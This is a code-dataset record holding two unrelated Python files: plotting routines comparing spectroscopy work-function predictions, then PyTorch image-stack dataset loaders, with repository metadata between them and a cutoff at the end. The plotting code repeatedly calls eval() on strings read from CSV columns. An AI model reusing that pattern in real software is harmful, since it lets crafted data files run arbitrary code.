ax.annotate('Label:{:.2f}'.format(df_name["estimate_wf"][ii]), xy=(df_name["estimate_wf"][ii], 0),
xytext=(df_name["estimate_wf"][ii], max_value_y*0.1),
arrowprops=dict(facecolor='green',lw=1,shrinkA=0,shrinkB=0))
if gb == True:
ax.annotate('GB:{:.2f}'.format(df_name["predict_gb"][ii]), xy=(df_name["predict_gb"][ii], 0),
xytext=(df_name["predict_gb"][ii], max_value_y*0.3),
arrowprops=dict(facecolor='red',lw=1,shrinkA=0,shrinkB=0))
if rf == True:
ax.annotate('RF:{:.2f}'.format(df_name["predict_rf"][ii]), xy=(df_name["predict_rf"][ii], 0),
xytext=(df_name["predict_rf"][ii], max_value_y*0.5),
arrowprops=dict(facecolor='blue',lw=1,shrinkA=0,shrinkB=0))
if fit == True:
ax.annotate('Fit:{:.2f}'.format(df_name["predict_fit"][ii]), xy=(df_name["predict_fit"][ii], 0),
xytext=(df_name["predict_fit"][ii], max_value_y*0.9),
arrowprops=dict(facecolor='black',lw=1,shrinkA=0,shrinkB=0))
if dabsfit == True:
ax.annotate('arFit:{:.2f}'.format(df_name["del_abs_fit"][ii]), xy=(df_name["del_abs_fit"][ii], 0),
xytext=(df_name["del_abs_fit"][ii], max_value_y*0.6),
arrowprops=dict(facecolor='magenta',lw=1,shrinkA=0,shrinkB=0))
if dlsqfit==True:
ax.annotate('srfit:{:.2f}'.format(df_name["del_lsq_fit"][ii]), xy=(df_name["del_lsq_fit"][ii], 0),
xytext=(df_name["del_lsq_fit"][ii], max_value_y*0.8),
arrowprops=dict(facecolor='cyan',lw=1,shrinkA=0,shrinkB=0))
# plt.text(min_value_x+0.01,max_value_y*0.45,
# "Label: {:.2f}\nGB : {:.2f}\ndif : {:.2f}\nRF : {:.2f}\ndif : {:.2f}\nsFit : {:.2f}\ndif : {:.2f}"
# .format(df_name["estimate_wf"][ii],
# df_name["predict_gb"][ii],df_name['diff_gb'][ii],
# df_name["predict_rf"][ii],df_name['diff_rf'][ii],
# df_name["del_abs_fit"][ii],df_name["del_lsq_diff"][ii]),fontsize=14)
plt.text(min_value_x+0.01,max_value_y*0.8,"Label: {:.2f}".format(df_name["estimate_wf"][ii],fontsize=14))
plt.show()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print(df_name.count())
def select_plot_widerange(df_name,comment='',gb=True, rf=True, fit=True, dabsfit=True, dlsqfit=True):
"""
Graph making
df_name is select df
xmaxを7.0eVにする
"""
#default 12
plt.rcParams["font.size"] = 14
plt.tight_layout()
start_time = time.time()
print("Start time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print("comment: ",comment)
print("number of data: ",df_name['diff_gb'].count())
for ii in df_name.index:
# print('index:',ii)
# print()
fig, ax = plt.subplots(1,1,figsize=(6,4))
ax.plot(np.array(eval(df_name["ene"][ii])),np.array(eval(df_name["n_pys"][ii])),'-o',label='Data')
ax.set_xlabel('Energy [eV]')
ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
max_value_y=max(np.array(eval(df_name["n_pys"][ii])))
min_value_y=min(np.array(eval(df_name["n_pys"][ii])))
max_value_x=7.0
# max_value_x=max(np.array(eval(df_name["ene"][ii])))
min_value_x=min(np.array(eval(df_name["ene"][ii])))
ax.set_ylim(0,max_value_y)
ax.set_xlim(min_value_x,max_value_x)
ax.set_title('Sample: {}, Power: {} [nW]'.format(df_name["Sample_name"][ii],df_name["photon_power"][ii]))
ax.annotate('Label:{:.2f}'.format(df_name["estimate_wf"][ii]), xy=(df_name["estimate_wf"][ii], 0),
xytext=(df_name["estimate_wf"][ii], max_value_y*0.1),
arrowprops=dict(facecolor='green',lw=1,shrinkA=0,shrinkB=0))
if gb == True:
ax.annotate('GB:{:.2f}'.format(df_name["predict_gb"][ii]), xy=(df_name["predict_gb"][ii], 0),
xytext=(df_name["predict_gb"][ii], max_value_y*0.3),
arrowprops=dict(facecolor='red',lw=1,shrinkA=0,shrinkB=0))
if rf == True:
ax.annotate('RF:{:.2f}'.format(df_name["predict_rf"][ii]), xy=(df_name["predict_rf"][ii], 0),
xytext=(df_name["predict_rf"][ii], max_value_y*0.5),
arrowprops=dict(facecolor='blue',lw=1,shrinkA=0,shrinkB=0))
if fit == True:
ax.annotate('Fit:{:.2f}'.format(df_name["predict_fit"][ii]), xy=(df_name["predict_fit"][ii], 0),
xytext=(df_name["predict_fit"][ii], max_value_y*0.9),
arrowprops=dict(facecolor='black',lw=1,shrinkA=0,shrinkB=0))
if dabsfit == True:
ax.annotate('arFit:{:.2f}'.format(df_name["del_abs_fit"][ii]), xy=(df_name["del_abs_fit"][ii], 0),
xytext=(df_name["del_abs_fit"][ii], max_value_y*0.6),
arrowprops=dict(facecolor='magenta',lw=1,shrinkA=0,shrinkB=0))
if dlsqfit==True:
ax.annotate('srfit:{:.2f}'.format(df_name["del_lsq_fit"][ii]), xy=(df_name["del_lsq_fit"][ii], 0),
xytext=(df_name["del_lsq_fit"][ii], max_value_y*0.8),
arrowprops=dict(facecolor='cyan',lw=1,shrinkA=0,shrinkB=0))
# plt.text(min_value_x+0.01,max_value_y*0.45,
# "Label: {:.2f}\nGB : {:.2f}\ndif : {:.2f}\nRF : {:.2f}\ndif : {:.2f}\nsFit : {:.2f}\ndif : {:.2f}"
# .format(df_name["estimate_wf"][ii],
# df_name["predict_gb"][ii],df_name['diff_gb'][ii],
# df_name["predict_rf"][ii],df_name['diff_rf'][ii],
# df_name["del_abs_fit"][ii],df_name["del_lsq_diff"][ii]),fontsize=14)
plt.text(min_value_x+0.01,max_value_y*0.8,"Label: {:.2f}".format(df_name["estimate_wf"][ii],fontsize=14))
plt.show()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print(df_name.count())
def select_plot_rangeselect(df_name, comment='', maxlimt=7, gb=True, rf=True, fit=True, dabsfit=True, dlsqfit=True):
"""
Fittingの回帰曲線を載せる
Graph making
df_name is select df
xmaxを7.0eVにする
"""
#default 12
plt.rcParams["font.size"] = 10
plt.tight_layout()
start_time = time.time()
print("Start time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print("comment: ",comment)
print("number of data: ",df_name['diff_gb'].count())
for ii in df_name.index:
# print('index:',ii)
# print()
ini_para=np.array([df_name["estimate_wf"][ii],300,1,10])
xdata = np.array(eval(df_name["ene"][ii]))
ydata = np.array(eval(df_name["n_pys"][ii]))
resultx = leastsq(ffo.spys_residual_func, ini_para,args=(xdata,ydata),maxfev=1000000)
result = resultx[0]
fit_spys = ff.spys(xdata, result[0], result[1], result[2], result[3])
print(result)
fig, ax = plt.subplots(1,1,figsize=(6,4),dpi=300)
ax.plot(xdata, ydata,'-o',label='Data')
ax.plot(xdata,fit_spys,linestyle='solid', label='Fit')
ax.set_xlabel('Energy [eV]')
ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
max_value_y=max(ydata)
min_value_y=min(ydata)
max_value_x=maxlimt
# max_value_x=max(np.array(eval(df_name["ene"][ii])))
min_value_x=min(xdata)
min_value_x=4.0
ax.set_ylim(0,max_value_y)
ax.set_xlim(min_value_x,max_value_x)
ax.set_title('Sample: {}, Power: {} [nW]'.format(df_name["Sample_name"][ii],df_name["photon_power"][ii]))
if dlsqfit==True:
ax.annotate('srfit:{:.2f}'.format(df_name["del_lsq_fit"][ii]), xy=(df_name["del_lsq_fit"][ii], 0),
xytext=(df_name["del_lsq_fit"][ii], max_value_y*0.8),
arrowprops=dict(facecolor='cyan',lw=1,shrinkA=0,shrinkB=0))
if dabsfit == True:
ax.annotate('arFit:{:.2f}'.format(df_name["del_abs_fit"][ii]), xy=(df_name["del_abs_fit"][ii], 0),
xytext=(df_name["del_abs_fit"][ii], max_value_y*0.6),
arrowprops=dict(facecolor='magenta',lw=1,shrinkA=0,shrinkB=0))
if fit == True:
ax.annotate('Fit:{:.2f}'.format(df_name["predict_fit"][ii]), xy=(df_name["predict_fit"][ii], 0),
xytext=(df_name["predict_fit"][ii], max_value_y*0.9),
arrowprops=dict(facecolor='black',lw=1,shrinkA=0,shrinkB=0))
if rf == True:
ax.annotate('RF:{:.2f}'.format(df_name["predict_rf"][ii]), xy=(df_name["predict_rf"][ii], 0),
xytext=(df_name["predict_rf"][ii], max_value_y*0.5),
arrowprops=dict(facecolor='blue',lw=1,shrinkA=0,shrinkB=0))
if gb == True:
ax.annotate('GB:{:.2f}'.format(df_name["predict_gb"][ii]), xy=(df_name["predict_gb"][ii], 0),
xytext=(df_name["predict_gb"][ii], max_value_y*0.3),
arrowprops=dict(facecolor='red',lw=1,shrinkA=0,shrinkB=0))
ax.annotate('Label:{:.2f}'.format(df_name["estimate_wf"][ii]), xy=(df_name["estimate_wf"][ii], 0),
xytext=(df_name["estimate_wf"][ii], max_value_y*0.1),
arrowprops=dict(facecolor='green',lw=1,shrinkA=0,shrinkB=0))
plt.legend(loc='upper left')
# plt.text(min_value_x+0.01,max_value_y*0.45,
# "Label: {:.2f}\nGB : {:.2f}\ndif : {:.2f}\nRF : {:.2f}\ndif : {:.2f}\nsFit : {:.2f}\ndif : {:.2f}"
# .format(df_name["estimate_wf"][ii],
# df_name["predict_gb"][ii],df_name['diff_gb'][ii],
# df_name["predict_rf"][ii],df_name['diff_rf'][ii],
# df_name["del_abs_fit"][ii],df_name["del_lsq_diff"][ii]))
plt.text(min_value_x+0.1,max_value_y*0.6,
"Label: {:.2f}\nGB : {:.2f}\nRF : {:.2f}\nFit : {:.2f}"
.format(df_name["estimate_wf"][ii],
df_name["predict_gb"][ii],
df_name["predict_rf"][ii],
df_name["predict_fit"][ii]))
# plt.text(min_value_x+0.01,max_value_y*0.8,"Label: {:.2f}".format(df_name["estimate_wf"][ii],fontsize=14))
plt.show()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print(df_name.count())
def yy_plot(df,xyrange=(4.5,6.0), gb=True, rf=True, fit=True, dabsfit=True, mark_name=True, abs_fit=False):
fig = plt.figure(figsize=(15, 15))
yyplot = plt.plot(df["estimate_wf"],df["estimate_wf"], label="R$^{2}$=1",c='r', alpha=1)
yyplot = plt.plot(df["estimate_wf"],df["estimate_wf"]+0.3, label="+0.3 eV",c='y',linestyle='-', alpha=0.5)
yyplot = plt.plot(df["estimate_wf"],df["estimate_wf"]-0.3, label="-0.3 eV",c='y',linestyle='-', alpha=0.5)
if gb == True:
yplot_gb = plt.scatter(df["estimate_wf"], df["predict_gb"], c='r',marker='o',label="GB",alpha=1)
if rf == True:
yplot_rf = plt.scatter(df["estimate_wf"], df["predict_rf"], c='m', marker='D',label="RF", alpha=1)
if fit == True:
yplot_fit = plt.scatter(df["estimate_wf"], df["predict_fit"], c='b', marker='^' ,label="Fit_lsq",alpha=1)
if abs_fit == True:
yplot_fit = plt.scatter(df["estimate_wf"], df["predict_fit_abs"], c='g', marker='s' ,label="Fit_abs",alpha=1)
if dabsfit == True:
yplot_abs = plt.scatter(df["estimate_wf"], df["del_abs_fit"], c='c', marker='*', label="Fit_rem",alpha=1)
plt.xlim(xyrange[0],xyrange[1])
plt.ylim(xyrange[0],xyrange[1])
plt.legend(loc='lower right',fontsize=15)
plt.xlabel('Observed[eV]',fontsize=20,labelpad=10)
plt.ylabel('Predicted[eV]',fontsize=20,labelpad=10)
plt.title('Observed-Predicted Plot',fontsize=20,pad=20)
plt.tick_params(labelsize=16)
if mark_name == True:
for i, txt in enumerate(df["Sample_name"].values):
if gb == True:
plt.annotate(txt,(df["estimate_wf"].values[i], df["predict_gb"].values[i]),size = 15)
if rf == True:
plt.annotate(txt,(df["estimate_wf"].values[i], df["predict_rf"].values[i]),size = 15)
if fit == True:
plt.annotate(txt,(df["estimate_wf"].values[i], df["predict_fit"].values[i]),size = 15)
if dabsfit == True:
plt.annotate(txt,(df["estimate_wf"].values[i], df["del_abs_fit"].values[i]),size = 15)
if abs_fit == True:
plt.annotate(txt,(df["estimate_wf"].values[i], df["predict_fit_abs"].values[i]),size = 15)
plt.show()
return fig
def class_separation(df,comment='', gb=True, rf=True, fit=True, dabsfit=False, dlsqfit=False, abs_fit=False):
"""
example:
newdf_name=df_select01
df=df
para="diff_gb"
para="diff_rf"
para="diff_fit"
para="diff_del_abs"
para="diff_del_lsq"
"""
paras = []
if gb == True:
paras.append("diff_gb")
if rf == True:
paras.append("diff_rf")
if fit == True:
paras.append("diff_fit")
if abs_fit == True:
paras.append("diff_fit_abs")
if dabsfit == True:
paras.append("del_abs_diff")
if dlsqfit == True:
paras.append("del_lsq_diff")
for para in paras:
df_temp01=df[(abs(df[para])>=0) &(abs(df[para])<=0.1)]
df_temp02=df[(abs(df[para])>0.1) &(abs(df[para])<=0.2)]
df_temp03=df[(abs(df[para])>0.2) &(abs(df[para])<=0.3)]
df_temp04=df[(abs(df[para])>0.3) &(abs(df[para])<=0.4)]
df_temp05=df[(abs(df[para])>0.4) &(abs(df[para])<=0.5)]
df_temp06=df[abs(df[para])>0.5]
df_temp07=df[abs(df[para])<0.3]
df_temp08=df[abs(df[para])>1.0]
print(para)
print('Comment:',comment)
print('----------------------')
print('total',df[para].count())
print('0<=0.1:',df_temp01[para].count(), '/total:',df_temp01[para].count()/df[para].count())
print('0.1<=0.2:',df_temp02[para].count(), '/total:',df_temp02[para].count()/df[para].count())
print('0.2<=0.3:',df_temp03[para].count(), '/total:',df_temp03[para].count()/df[para].count())
print('0.3<=0.4:',df_temp04[para].count(), '/total:',df_temp04[para].count()/df[para].count())
print('0.4<=0.5:',df_temp05[para].count(), '/total:',df_temp05[para].count()/df[para].count())
print('0.5>:',df_temp06[para].count(), '/total:',df_temp06[para].count()/df[para].count())
print('1.0>:',df_temp08[para].count(), '/total:',df_temp08[para].count()/df[para].count())
print()
print('0.3<:',df_temp07[para].count(), '/total:',df_temp07[para].count()/df[para].count())
print('----------------------')
print()
def fitting_3plots(df,comment=''):
"""
20200417 add function
For JSA paper
lsq, mae, remove fit
plot graph
"""
for i in df.index:
xdata = np.array(eval(df["ene"][i]))
ydata = np.array(eval(df["n_pys"][i]))
ini_para = [df["estimate_wf"][i],300,1,10]
sample_name= df["Sample_name"][i]
fit_3=rfpl.SPYSRangFit(xdata=xdata, ydata=ydata, para=ini_para )
fit_3p = fit_3.fitting_del_range_rer2(start_remove=0, iteration_step=1)
# fit_3p = fit_3.fitting_del_range(start_remove=0, iteration_step=1)
fit_lsq_p=fit_3p['n_lsq_para']
fit_abs_p=fit_3p['n_abs_para']
fit_rem_p=fit_3p['abs_para']
rem_p=fit_3p['remove']
fit_lsq = ff.spys(xdata, fit_lsq_p[0],fit_lsq_p[1],fit_lsq_p[2],fit_lsq_p[3])
fit_abs = ff.spys(xdata, fit_abs_p[0],fit_abs_p[1],fit_abs_p[2],fit_abs_p[3])
if rem_p == 0:
xdata_ = xdata[:]
ydata_ = ydata[:]
else:
xdata_ = xdata[:(-1 * rem_p)]
ydata_ = ydata[:(-1 * rem_p)]
fit_rem = ff.spys(xdata_, fit_rem_p[0],fit_rem_p[1],fit_rem_p[2],fit_rem_p[3])
if fit_rem_p[0] == fit_abs_p[0]:
print('abs = rem')
print('**** remove: {} ****'.format(rem_p))
plt.rcParams["font.size"] = 16
fig =plt.figure(figsize=(8,6))
ax=fig.add_subplot(1,1,1)
ax.set_title(sample_name)
ax.set_title('Sample: {}, Power: {} [nW]'.format(df["Sample_name"][i],
df["photon_power"][i]))
ax.plot(xdata,ydata,"ro",label='Data')
ax.plot(xdata,fit_lsq,"b^-",label='Fit_lsq')
ax.plot(xdata,fit_abs,"gs-",label='Fit_lab')
ax.plot(xdata_,fit_rem,"c*-",label='Fit_ar')
ax.legend(loc='upper left')
ax.set_xlabel('Energy [eV]')
ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
max_value_y=max(ydata)
ax.set_ylim(0,max_value_y)
if fit_lsq_p[0] <=7.0 :
ax.annotate('Fit_lsq:{:.2f}'.format(fit_lsq_p[0]), xy=(fit_lsq_p[0], 0),
xytext=(fit_lsq_p[0], max_value_y*0.4),
arrowprops=dict(facecolor='blue',lw=1,shrinkA=0,shrinkB=0))
if fit_abs_p[0] <= 7.0:
ax.annotate('Fit_lab:{:.2f}'.format(fit_abs_p[0]), xy=(fit_abs_p[0], 0),
xytext=(fit_abs_p[0], max_value_y*0.6),
arrowprops=dict(facecolor='green',lw=1,shrinkA=0,shrinkB=0))
if fit_rem_p[0] <= 7.0:
ax.annotate('Fit_ar:{:.2f}\nRem:{}'.format(fit_rem_p[0],rem_p), xy=(fit_rem_p[0] , 0),
xytext=(fit_rem_p[0], max_value_y*0.8),
arrowprops=dict(facecolor='cyan',lw=1,shrinkA=0,shrinkB=0))
ax.annotate('Label:{:.2f}'.format(ini_para[0]), xy=(ini_para[0], 0),
xytext=(ini_para[0], max_value_y*0.2),
arrowprops=dict(facecolor='red',lw=1,shrinkA=0,shrinkB=0))
plt.show()
| 41.505246
| 150
| 0.493904
| 6,677
| 51,425
| 3.572263
| 0.050472
| 0.05358
| 0.028677
| 0.02222
| 0.842152
| 0.816871
| 0.79398
| 0.770711
| 0.756792
| 0.752264
| 0
| 0.025515
| 0.330092
| 51,425
| 1,239
| 151
| 41.505246
| 0.666851
| 0.071755
| 0
| 0.740409
| 0
| 0
| 0.165619
| 0.013734
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0.003836
| 0.019182
| 0.001279
| 0.044757
| 0.322251
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a740310d604ca3a6a6297fae7ac0986b9c747e8
| 24,583
|
py
|
Python
|
src/data_handle/dataset.py
|
georghess/EBM_ONGOING
|
c5cabe71d26972a7346c13248549b6b4b4fca9f0
|
[
"MIT"
] | null | null | null |
src/data_handle/dataset.py
|
georghess/EBM_ONGOING
|
c5cabe71d26972a7346c13248549b6b4b4fca9f0
|
[
"MIT"
] | null | null | null |
src/data_handle/dataset.py
|
georghess/EBM_ONGOING
|
c5cabe71d26972a7346c13248549b6b4b4fca9f0
|
[
"MIT"
] | 1
|
2022-03-28T07:55:57.000Z
|
2022-03-28T07:55:57.000Z
|
import os
import glob
import numpy as np
import pandas as pd
from skimage import io
import torch
from torch.utils.data import Dataset
import zipfile
from util import utils_np
'''
'''
class ImageStackDatasetSim(Dataset):
def __init__(self, csv_path, root_dir, channel_per_image, transform=None, T_channel=False):
'''
Args:
csv_path: Path to the CSV file with dataset info.
root_dir: Directory with all image folders.
root_dir - obj_folder - obj & env
'''
super().__init__()
self.info_frame = pd.read_csv(csv_path)
self.root_dir = root_dir
self.tr = transform
self.with_T = T_channel
self.cpi = channel_per_image
self.nc = len(list(self.info_frame))-4 # number of image channels in total
self.img_shape = self.check_img_shape()
def __len__(self):
return len(self.info_frame)
def __getitem__(self,idx):
if torch.is_tensor(idx):
idx = idx.tolist()
input_img = np.empty(shape=[self.img_shape[0],self.img_shape[1],0])
info = self.info_frame.iloc[idx]
self.T = info['T']
index = info['index']
traj = []
for i in range(self.nc):
img_name = info['f{}'.format(i)]
obj_id = img_name.split('_')[0]
if self.cpi == 1:
img_path = os.path.join(self.root_dir, obj_id, img_name)
this_x = float(img_name[:-4].split('_')[2])
this_y = float(img_name[:-4].split('_')[3])
traj.append([this_x,this_y])
elif self.cpi == 2:
if len(img_name.split('_'))==5:
img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
time_step = int(img_name[:-4].split('_')[1])
this_x = float(img_name[:-4].split('_')[2])
this_y = float(img_name[:-4].split('_')[3])
traj.append([this_x,this_y])
else:
img_path = os.path.join(self.root_dir, obj_id, 'env', img_name)
image = self.togray(io.imread(img_path))
input_img = np.concatenate((input_img, image[:,:,np.newaxis]), axis=2)
if self.with_T:
T_channel = np.ones(shape=[self.img_shape[0],self.img_shape[1],1])*self.T # T_channel
input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
label = {'x':info['x'], 'y':info['y']}
sample = {'image':input_img, 'label':label}
if self.tr:
sample = self.tr(sample)
sample['index'] = index
sample['traj'] = traj
if self.cpi == 2:
sample['time'] = time_step
return sample
def togray(self, image):
if (len(image.shape)==2):
return image
elif (len(image.shape)==3) and (image.shape[2]==1):
return image[:,:,0]
else:
image = image[:,:,:3] # ignore alpha
img = image[:,:,0]/3 + image[:,:,1]/3 + image[:,:,2]/3
return img
def check_img_shape(self):
info = self.info_frame.iloc[0]
img_name = info['f0']
obj_id = img_name.split('_')[0]
if self.cpi == 1:
img_path = os.path.join(self.root_dir, obj_id, img_name)
elif self.cpi == 2:
img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
image = self.togray(io.imread(img_path))
return image.shape
class ImageStackDatasetSim_ZIP(Dataset):
def __init__(self, zip_path, csv_path, root_dir, channel_per_image, transform=None, T_channel=False):
'''
Args:
zip_path: Path to the ZIP file with everything
csv_path: Path to the CSV file with dataset info.
root_dir: Directory with all image folders.
root_dir - obj_folder - obj & env
'''
super().__init__()
self.archive = zipfile.ZipFile(zip_path, 'r')
self.info_frame = pd.read_csv(self.archive.open(csv_path))
self.root_dir = root_dir
self.tr = transform
self.with_T = T_channel
self.cpi = channel_per_image
self.nc = len(list(self.info_frame))-4 # number of image channels in total
self.img_shape = self.check_img_shape()
def __len__(self):
return len(self.info_frame)
def __getitem__(self,idx):
if torch.is_tensor(idx):
idx = idx.tolist()
input_img = np.empty(shape=[self.img_shape[0],self.img_shape[1],0])
info = self.info_frame.iloc[idx]
self.T = info['T']
index = info['index']
traj = []
for i in range(self.nc):
img_name = info['f{}'.format(i)]
obj_id = img_name.split('_')[0]
if self.cpi == 1:
img_path = os.path.join(self.root_dir, obj_id, img_name)
this_x = float(img_name[:-4].split('_')[2])
this_y = float(img_name[:-4].split('_')[3])
traj.append([this_x,this_y])
elif self.cpi == 2:
if len(img_name.split('_'))==5:
img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
time_step = int(img_name[:-4].split('_')[1])
this_x = float(img_name[:-4].split('_')[2])
this_y = float(img_name[:-4].split('_')[3])
traj.append([this_x,this_y])
else:
img_path = os.path.join(self.root_dir, obj_id, 'env', img_name)
image = self.togray(io.imread(self.archive.open(img_path)))
input_img = np.concatenate((input_img, image[:,:,np.newaxis]), axis=2)
if self.with_T:
T_channel = np.ones(shape=[self.img_shape[0],self.img_shape[1],1])*self.T # T_channel
input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
label = {'x':info['x'], 'y':info['y']}
sample = {'image':input_img, 'label':label}
if self.tr:
sample = self.tr(sample)
sample['index'] = index
sample['traj'] = traj
if self.cpi == 2:
sample['time'] = time_step
return sample
def togray(self, image):
if (len(image.shape)==2):
return image
elif (len(image.shape)==3) and (image.shape[2]==1):
return image[:,:,0]
else:
image = image[:,:,:3] # ignore alpha
img = image[:,:,0]/3 + image[:,:,1]/3 + image[:,:,2]/3
return img
def check_img_shape(self):
info = self.info_frame.iloc[0]
img_name = info['f0']
obj_id = img_name.split('_')[0]
if self.cpi == 1:
img_path = os.path.join(self.root_dir, obj_id, img_name)
elif self.cpi == 2:
img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
image = self.togray(io.imread(self.archive.open(img_path)))
return image.shape
class ImageStackDatasetSDD(Dataset):
def __init__(self, csv_path, root_dir, ext='.jpg', channel_per_image=None, transform=None, T_channel=False):
'''
Args:
csv_path: Path to the CSV file with dataset info.
root_dir: Directory with all image folders.
root_dir - video_folder - imgs
'''
super().__init__()
self.info_frame = pd.read_csv(csv_path)
self.root_dir = root_dir
self.tr = transform
self.with_T = T_channel
self.ext = ext
self.nc = len(list(self.info_frame))-5 # number of image channels in half
self.img_shape = self.check_img_shape()
def __len__(self):
return len(self.info_frame)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
input_img = np.empty(shape=[self.img_shape[0],self.img_shape[1],0])
info = self.info_frame.iloc[idx]
self.T = info['T']
index = info['index']
traj = []
for i in range(self.nc):
img_name = info[f't{i}'].split('_')[0] + self.ext
video_idx = info['index']
img_path = os.path.join(self.root_dir, video_idx, img_name)
csv_name = glob.glob(os.path.join(self.root_dir, video_idx, '*.csv'))
original_scale = os.path.basename(csv_name[0]).split('.')[0]
original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
time_step = int(info[f't{i}'].split('_')[0])
this_x = float(info[f't{i}'].split('_')[1])
this_y = float(info[f't{i}'].split('_')[2])
traj.append([this_x,this_y])
image = self.togray(io.imread(img_path))
input_img = np.concatenate((input_img, image[:,:,np.newaxis]), axis=2)
white_canvas = np.zeros_like(image)
# obj_coords = self.rescale_label((this_x, this_y), original_scale)
obj_coords = (this_x, this_y)
obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20,20])
input_img = np.concatenate((input_img, obj_map[:,:,np.newaxis]), axis=2)
if self.with_T:
T_channel = np.ones(shape=[self.img_shape[0],self.img_shape[1],1])*self.T # T_channel
input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
label = {'x':info['x'], 'y':info['y']}
sample = {'image':input_img, 'label':label}
if self.tr:
sample = self.tr(sample)
sample['index'] = index
sample['traj'] = traj
sample['time'] = time_step
return sample
def rescale_label(self, label, original_scale): # x,y & HxW
current_scale = self.check_img_shape()
rescale = (current_scale[0]/original_scale[0] , current_scale[1]/original_scale[1])
return (label[0]*rescale[1], label[1]*rescale[0])
def togray(self, image):
if (len(image.shape)==2):
return image
elif (len(image.shape)==3) and (image.shape[2]==1):
return image[:,:,0]
else:
image = image[:,:,:3] # ignore alpha
img = image[:,:,0]/3 + image[:,:,1]/3 + image[:,:,2]/3
return img
def check_img_shape(self):
info = self.info_frame.iloc[0]
img_name = info['t0'].split('_')[0] + self.ext
video_folder = info['index']
img_path = os.path.join(self.root_dir, video_folder, img_name)
image = self.togray(io.imread(img_path))
return image.shape
class ImageStackDatasetSDD_ZIP(Dataset):
def __init__(self, zip_path, csv_path, root_dir, ext='.jpg', channel_per_image=None, transform=None, T_channel=False):
'''
Args:
zip_path: Path (absolute) to the ZIP file with everything
csv_path: Path (relative) to the CSV file with dataset info.
root_dir: Directory (relative) with all image folders.
root_dir - obj_folder - obj & other
'''
super().__init__()
self.archive = zipfile.ZipFile(zip_path, 'r')
self.info_frame = pd.read_csv(self.archive.open(csv_path))
self.root_dir = root_dir
self.tr = transform
self.with_T = T_channel
self.cpi = channel_per_image
self.ext = ext
self.nc = len(list(self.info_frame))-5 # number of image channels in half
self.img_shape = self.check_img_shape()
def __len__(self):
return len(self.info_frame)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
input_img = np.empty(shape=[self.img_shape[0],self.img_shape[1],0])
info = self.info_frame.iloc[idx]
self.T = info['T']
index = info['index']
traj = []
for i in range(self.nc):
img_name = info[f't{i}'].split('_')[0] + self.ext
video_idx = info['index']
img_path = os.path.join(self.root_dir, video_idx, img_name)
csv_name = [x for x in self.archive.namelist() if ((video_idx in x)&('csv' in x))]
original_scale = os.path.basename(csv_name[0]).split('.')[0]
original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
time_step = int(info[f't{i}'].split('_')[0])
this_x = float(info[f't{i}'].split('_')[1])
this_y = float(info[f't{i}'].split('_')[2])
traj.append([this_x,this_y])
image = self.togray(io.imread(self.archive.open(img_path)))
input_img = np.concatenate((input_img, image[:,:,np.newaxis]), axis=2)
white_canvas = np.zeros_like(image)
# obj_coords = self.rescale_label((this_x, this_y), original_scale)
obj_coords = (this_x, this_y)
obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20,20])
input_img = np.concatenate((input_img, obj_map[:,:,np.newaxis]), axis=2)
if self.with_T:
T_channel = np.ones(shape=[self.img_shape[0],self.img_shape[1],1])*self.T # T_channel
input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
label = {'x':info['x'], 'y':info['y']}
sample = {'image':input_img, 'label':label}
if self.tr:
sample = self.tr(sample)
sample['index'] = index
sample['traj'] = traj
sample['time'] = time_step
return sample
def rescale_label(self, label, original_scale): # x,y & HxW
current_scale = self.check_img_shape()
rescale = (current_scale[0]/original_scale[0] , current_scale[1]/original_scale[1])
return (label[0]*rescale[1], label[1]*rescale[0])
def togray(self, image):
if (len(image.shape)==2):
return image
elif (len(image.shape)==3) and (image.shape[2]==1):
return image[:,:,0]
else:
image = image[:,:,:3] # ignore alpha
img = image[:,:,0]/3 + image[:,:,1]/3 + image[:,:,2]/3
return img
def check_img_shape(self):
info = self.info_frame.iloc[0]
img_name = info['t0'].split('_')[0] + self.ext
video_folder = info['index']
img_path = os.path.join(self.root_dir, video_folder, img_name)
image = self.togray(io.imread(self.archive.open(img_path)))
return image.shape
class ImageStackDatasetSDDtr(Dataset): # for trajectory
def __init__(self, csv_path, root_dir, ext='.jpg', transform=None, T_channel=None):
'''
Args:
csv_path: Path to the CSV file with dataset info.
root_dir: Directory with all image folders.
root_dir - video_folder - imgs
'''
super().__init__()
self.info_frame = pd.read_csv(csv_path)
self.root_dir = root_dir
self.tr = transform
self.ext = ext
self.nc = len([x for x in list(self.info_frame) if 't' in x]) # number of image channels in half
self.img_shape = self.check_img_shape()
def __len__(self):
return len(self.info_frame)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
